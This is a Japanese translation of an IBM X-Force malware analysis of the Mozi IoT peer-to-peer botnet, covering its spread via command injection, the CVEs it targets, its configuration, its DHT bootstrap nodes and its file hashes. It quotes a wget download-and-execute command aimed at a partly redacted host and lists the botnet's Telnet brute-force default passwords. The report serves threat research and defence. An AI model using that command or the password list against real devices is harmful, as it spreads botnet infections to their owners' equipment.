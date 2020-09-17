IBM X-Forceは、脅威分野における比較的新しいプレーヤーであるMoziボットネットが、モノのインターネット（IoT）デバイスの間で急増していることを発見しました。
このマルウェアは2019年後半から活動しており、Miraiおよびその亜種とコードと重なっています。Moziは、2019年10月から2020年6月までに観測されたIoTネットワーク・トラフィックのほぼ90％を占めました。
この驚異的な奪取は、全体的なIoTボットネット活動の大幅な増加を伴っており、Moziが競争相手を市場から排除していないことを示唆しています。むしろ市場に浸透し、他の亜種の活動を弱体化させました。全体として、攻撃が著しく増加し始めた2019年10月から2020年6月までのIoT攻撃の合計数は、過去2年間のIoT攻撃数の合計よりも400%増加しています。
このようなIoT攻撃の急増は、さまざまな原因に起因する可能性がありますが、脅威アクターが標的にできるIoT環境が拡大し続けていることが原因である可能性もあります。世界中で約31億台のIoTデバイスが導入されており、IoTの導入率は現在1秒あたり127台にも達しています。
攻撃者はかなり前から、特にMiraiボットネットを介して、これらのデバイスを悪用しています。IBM X-Force Incident Response and Intelligence Services（IRIS）チームは、ほぼ 4 年間にわたってこの現象を追跡してきました。では、なぜ突然急上昇したのでしょうか？IBMの研究によれば、Moziが引き続き成功を収めている主な要因は、コマンド・インジェクション（CMDi）攻撃の利用にあり、この攻撃は、IoT機器の構成ミスから生じる場合が多々あります。IoT使用量の継続的な増加と構成プロトコルの不十分さが、この急増の原因となっている可能性が高いと考えられます。この増加は、新型コロナウイルス感染症の影響で企業ネットワークへのリモート・アクセスが増えたことで、さらに加速された可能性があります。
IoTボットネットは、分散型サービス拒否（DDoS）攻撃、データの窃取、スパムの送信に利用できます。IoTデバイスには、以下のようなさまざまな種類があります。
この大規模な攻撃対象領域により、組織はIoTボットネットに対して脆弱なままになっています。それに加えて、これらのデバイスには出荷時からのセキュリティー・ホールが頻繁に見られ、導入時のセキュリティー対策も不十分な場合がよくあります。IoTにおける最も注目すべき脆弱性は、CMDi攻撃を介して発生します。
IBMが観測したほぼすべてのIoTターゲットは、デバイスへの初期アクセスを得るためにCMDi攻撃を使用しようとしました。ターゲットのエンドポイントがIoTであり、これらの攻撃を受けやすい場合は、ペイロードがダウンロードされて実行されました。
CMDi攻撃がIoTデバイスに対して非常に一般的である理由には、いくつかあります。まず、IoT内蔵システムには、一般に悪用可能なWebインターフェースと、ファームウェア開発から残っているデバッグ・インターフェースが含まれています。第2に、IoT Webインターフェースに組み込まれたPHPモジュールを悪用して、悪意のある攻撃者にリモート実行機能を提供する可能性があります。そして第3に、IoTインターフェースは、管理者が予期されるリモート入力をサニタイズしてインターフェースを強化することを怠ったため、導入時に脆弱なままになることがよくあります。 これにより、脅威アクターは「wget」などのシェルコマンドを入力できます。
分析の結果、Moziボットネットが「wget」シェル・コマンドを使用し、その後脅威アクターが影響を受けるシステムと対話できるように権限を変更することでCMDiを活用していることが判明しました。例：
wget http://xxx.xx.xxx.xxx/bins/mozi.a-o /var/tmp/mozi.a;chmod 777 /var/tmp/mozi.a;rm -rf /var/tmp/mozi.a
ホストがCMDiに対して脆弱な場合、このコマンドは「mozi.a」というファイルをダウンロードして実行します。この特定のサンプルの分析では、ファイルはインターロック付きパイプライン・ステージ（MIPS）アーキテクチャーなしでマイクロプロセッサー上で実行されることが示されました。これは、多くの IoTデバイスで普及している、縮小命令セット・コンピューター（RISC）アーキテクチャーを実行するマシンによって理解される拡張機能です。攻撃者がボットネットを通じてデバイスに完全にアクセスすると、ファームウェア・レベルが変更され、追加のマルウェアがデバイスに仕掛けられる可能性があります。
この例ではよく知られたベクトルを挙げていますが、主な理由は2つあります。まず、新たな脆弱性により、CMDiを介したエクスプロイテーションの試みが継続的に更新され、パッチの実装の遅れが悪用される可能性があります。第2に、この活動は簡単に自動化できるため、脅威アクターは低コストで広範囲のデバイスを迅速に攻撃できるようになります。
Moziボットネット・インフラストラクチャーは主に中国で発生しており、観察されたインフラストラクチャーの84％を占めています。この事実は、2020年のIoTに関する他のオープンソースの研究と一致しています。
以下は、IBMが観察したMoziボットネットのエクスプロイトを試みる脆弱性のリストです。
|脆弱性
|影響を受けるデバイス
|CVE-2017-17215
|Huawei HG532
|CVE-2018-10561 / CVE-2018-10562
|GPONルーター
|CVE-2014-8361
|Realtek SDKを使用するデバイス
|Eir D1000 ワイヤレス・ルーターRCI
|Eir D1000ワイヤレス・ルーター
|CVE-2008-4873
|Sepal SPBOARD
|CVE-2016-6277
|Netgear R7000 / R6400
|Netgear Setup.cgi unauthenticated RCE
|Netgear DGN1000
|MVPower DVRコマンド実行
|MVPower DVR TV-7104HE
|CVE-2015-2051
|D-Linkデバイス
|D-Link UPnP SOAPコマンド実行
|D-Linkデバイス
|CCTV-DVRベンダー RCE
|複数のCCTV-DVRベンダー
Moziボットネットは、分散型不正ハッシュ・テーブル（DSHT）プロトコルに基づくピアツーピア（P2P）ボットネットであり、IoTデバイスのエクスプロイトや脆弱なテレネット・パスワードを介して拡散する可能性があります。
実行時に、MoziボットネットはローカルUDPポート14737をバインドしようとします。このサンプルでは、/proc/net/tcpまたは/proc/net/rawを読み取り、ポート1536および5888を使用するプロセスを見つけて強制終了します。このサンプルでは、ファイル/usr/bin/pythonが存在するかどうかを確認します。存在する場合、サンプルはプロセス名をsshdに変更します。それ以外の場合は、サンプルはdropearに変更します。
Moziボットネットには、少なくとも2つの独自の特性があることが知られています。ECDSA384（楕円曲線デジタル署名アルゴリズム384）を使用して完全性を検証します。さらに、Gafgytのコードの一部を再利用します。
これには、P2Pネットワークへの参加に使用できるハードコード化されたDHTパブリック・ノードが含まれています。これらのノードは以下の通りです。
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Moziボットネットには、4つの主要機能が含まれています。DDoS攻撃（HTTP、TCP、UDP）を実行することができます。コマンド実行攻撃を実行する指定されたURLから悪意のあるペイロードをダウンロードして実行するボット情報を収集します。
以下の表に、分析されたファイルの大まかな詳細を示します。詳細には、送信されたファイルと残差ファイルの両方が含まれます（残りのファイルは、マルウェア分析中に静的または動的に抽出されるファイルです）。データには、ファイル名、分析によって決定されたファイル・カテゴリー、ファイル・ハッシュ、テーブル内の他のファイルと関係のあるファイルの親子関係が含まれます。
|ファイル名
|ファイルのカテゴリー
|ファイル・ハッシュ
|親
|mozi.m
|ボットネット
|4dde761681684d7edad4e5e1ffdb940b
|該当なし
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|ボットネット
|86d42d968d3d12c36722e16c78e49ffb
|mozi.m
|mozi.a
|ボットネット
|9a111588a7db15b796421bd13a949cd4
|該当なし
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|ボットネット
|dd4b6f3216709e193ed9f06c37bcc3890
|mozi.a
実行時、サンプルはローカルUDPポート14737をバインドしようとします。このサンプルでは、/proc/net/tcpまたは/proc/net/rawを読み取り、ポート1536および5888を使用するプロセスを見つけて強制終了します。このサンプルでは、ファイル/usr/bin/pythonが存在するかどうかを確認します。存在する場合、サンプルはプロセス名をsshdに変更します。それ以外の場合、サンプルではdropearに変更されます。
また、このサンプルではアクセス制御リストを更新してSSHとTelnetをブロックし、他のボットネットがそれらを使用できないようにしようとします。
iptables -I INPUT -p tcp –destination-port 22 -j DROP iptables -I INPUT -p tcp –destination-port 23 -j DROP iptables -I INPUT -p tcp –destination-port 2323 -j DROP iptables -I OUTPUT -p tcp –source-port 22 -j DROP iptables -I OUTPUT -p tcp –source-port 23 -j DROP iptables -I OUTPUT -p tcp –source-port 2323 -j DROP
また、iptable内のハードコード化されたポートをランダムに選択します。
Moziボットネットは、カスタマイズされたDHTプロトコルを使用してP2Pネットワークを開発します。新しいMoziノードがDHTネットワークに参加するプロセスは次のとおりです。
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
このサンプルでは、現在のノードのIDを生成する必要があります。Moziに関する360 Netlabレポートによると、「IDは20バイトで、サンプルに埋め込まれたプレフィックス888888または構成ファイル[hp]で指定されたプレフィックスと、ランダムに生成された文字列で構成される」とのことです。構成ファイルは以下のとおりです。
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
DHTネットワークに参加するために、サンプルはこれらのハードコード化されたDHTパブリック・ノードにpingクエリーを送信します。ノードIDを含むpingクエリーは、以下のWiresharkのトラフィックに示されています
どちらのサンプルも、カスタマイズされたUPXパッカーを使用してパックされます。p_info構造のp_file_sizeとp_blocksizeの値をゼロに消去します。
このサンプルには、以下のハードコード化された構成ファイルが含まれています。
この構成ファイルには、次の4つのセクションがあります。
構成データは、ハードコード化されたXORキー、4E665A8F80C8AC238DAC4706D54F6F7Eを使用してエンコードされます。デコードされた構成データは以下のとおりです。
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
構成データは、次のようにタグ付けされた複数のコマンドをサポートしています。
|タグ（コマンド）
|説明
|[ss]
|ボットの役割
|[ssx]
|タグの有効化/無効化 [ss]
|[cpu]
|CPUアーキテクチャー
|[cpux]
|タグの有効化/無効化 [cpu]
|[nd]
|新しいDHTノード
|[hp]
|DHTノードのハッシュ・プレフィックス
|[atk]
|DDoS攻撃タイプ
|[ver]
|DHTプロトコルのVセクションの値
|[sv]
|構成の更新
|[ud]
|ボットの更新
|[dr]
|指定されたURLからペイロードをダウンロードして実行
|[rn]
|指定したコマンドを実行
|[dip]
|ip:portでMoziボットをダウンロード
|[idp]
|ボットを報告
|[count]
|ボットを報告するために使用されるURL
Moziボットネットは、DDoS攻撃でGafgytコードの一部を再利用します。HTTP、TCP、UDPなどの複数のDDoS攻撃タイプをサポートします。
ECDSA384 signature1は、構成データのハッシュ値を検証するために使用されます。検証に使われるハードコード化された公開鍵は次のとおりです。
4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88
XORキー4E665A8F80C8AC238DAC4706D54F6F7Eでエンコードされています。デコードされた公開鍵は次のとおりです。
02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 c6
構成バージョンによって、ボットを更新するタイミングが決まります。この値が現在の値より大きい場合に、ボットが更新されます。ECDSA384 signature 2は、構成ファイルの最初の3つの部分を検証するために使用されます。検証に使用されるハードコード化された公開鍵は次のとおりです。
4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 A1
XORキー4E665A8F80C8AC238DAC4706D54F6F7Eでエンコードされています。デコードされた公開鍵は次のとおりです。
02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea ef
Moziボットネットは、被害デバイスへのアクセスを取得するために悪用される脆弱性に加えて、ハードコード化された認証情報のリストを使用して、Telnet認証情報を総当たり攻撃することもできます。
root admin CUAdmin default rapport super telnetadmin !!Huawei keomeo support CMCCAdmin e8telnet e8ehome1 e8ehome user mother Administrator service supervisor guest admin1 administrator 666666 888888 ubnt tech xc3511 vizxv Pon521 e2008jl r@p8p0r+ GM8182 gpon Zte521 hg2x0 epicrouter conexant xJ4pCYeW v2mprt PhrQjGzk h@32LuyD gw1admin adminpass xmhdipc juantech @HuaweiHgw adminHW 2010vesta 2011vesta plumeria0077 cat1029 123456 54321 hi3518 password 12345 fucker pass admin1234 1111 smcadmin 1234 klv123 klv1234 zte jvbzd anko zlxx 7ujMko0vizxv 7ujMko0admin system ikwb dreambox realtek 00000000 1111111 meinsm
このサンプルで使用する1つのTelnetログイン・ブルートフォース攻撃は次のとおりです。
Mozi.mとMozi.a
ネットワーク
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
注目すべき文字列（パックされていない）
8.8.8.8 /proc/net/route Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0) Mozilla/4.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0) Mozilla/4.0(compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4 Mozilla/5.0(Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56 Mozilla/5.0(Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51 Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00 Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30) Mozilla/4.0(compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0) Mozilla/4.0(compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4;InfoPath.3;SV1; .NET CLR 3.4.53360; WOW64; en-US) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts) Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0 GET HEAD POST ./config /tmp/config cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1” cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi” iptables -I INPUT -p tcp –destination-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 7547 -j DROP iptables -I OUTPUT -p tcp –source-port 7547 -j DROP [cpux] [/cpux] [cpu] [/cpu] [ssx] [/ssx] [ss] [/ss] none [sv] [/sv] [rn] [/rn] run: [nd] [/nd] /tmp /var /temp iptables -I INPUT -p udp –destination-port %d -j ACCEPT iptables -I OUTPUT -p udp –source-port %d -j ACCEPT iptables -I PREROUTING -t nat -p udp –destination-port %d -j ACCEPT iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT 0.0.0.0 [idp] This node doesn’t accept announces dht.transmissionbt.com:6881 router.bittorrent.com:6881 router.utorrent.com:6881 bttracker.debian.org:6881 212.129.33.59:6881 82.221.103.244:6881 130.239.18.159:6881 87.98.162.88:6881
IoTボットネットの状況は変化し続けており、IBM Securityのデータは、脅威アクターが依然としてこの領域で活動していることを示唆しています。Moziなどの新しいボットネット・グループが活動を拡大し、全体的なIoTアクティビティーが急増する中、IoTデバイスを使用する組織は進化する脅威を認識する必要があります。IBMは、エンタープライズ IoTデバイスが攻撃者による攻撃にさらされることをますます目にしています。コマンド・インジェクションは依然として脅威アクターにとって主な感染経路であり、デフォルトのデバイス設定を変更し、効果的なペネトレーション・テストを使用して防御の隙間を見つけて修正することがいかに重要であるかを繰り返し述べています。
Mozi.m Metadata
|ファイル名：
|Mozi.m
|ファイル・サイズ：
|108,808
|MD5：
|4dde761681684d7edad4e5e1ffdb940b
|SHA1：
|2327be693bc11a618c380d7d3abc2382d870d48b
|SHA256：
|d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
|ファイル・タイプ：
|ELF 32 ビット MSB実行可能ファイル、MIPS、MIPS-Iバージョン 1（SYSV）、静的リンク、ストリッピング
|カテゴリー：
|ボットネット
|IRIS名：
|Mozi
|その他の名称：
Mozi.a Metadata
|ファイル名：
|Mozi.a
|ファイル・サイズ：
|95,268
|MD5：
|9a111588a7db15b796421bd13a949cd4
|SHA1：
|034c8c51a58be11ca620ce3eb0d43d5a59275d2f
|SHA256：
|e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
|ファイル・タイプ：
|ELF 32ビット LSB実行ファイル、ARM、バージョン1、静的リンク、ストリッピング
|カテゴリー：
|ボットネット
|IRIS名：
|Mozi
|その他の名称：
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata
|ファイル名：
|d546_unpacked
|ファイル・サイズ：
|266、108
|MD5：
|86d42d968d3d12c36722e16c78e49ffb
|SHA1：
|ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
|SHA256：
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|ファイル・タイプ：
|ELF 32 ビット MSB実行可能ファイル、MIPS、MIPS-Iバージョン 1（SYSV）、静的リンク、ストリッピング
|カテゴリー：
|ボットネット
|IRIS名：
|Mozi
|その他の名称：
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadata
|ファイル名：
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|ファイル・サイズ：
|212、464
|MD5：
|dd4b6f3216709e193ed9f06c37bcc389
|SHA1：
|758ba1ab22dd37f0f9d6fd09419bfef44f810345
|SHA256：
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|ファイル・タイプ：
|b'ELF 32-bit LSB実行可能、ARM、バージョン1、静的リンク、ストリッピング
|カテゴリー：
|ボットネット
|IRIS名：
|Mozi
|その他の名称：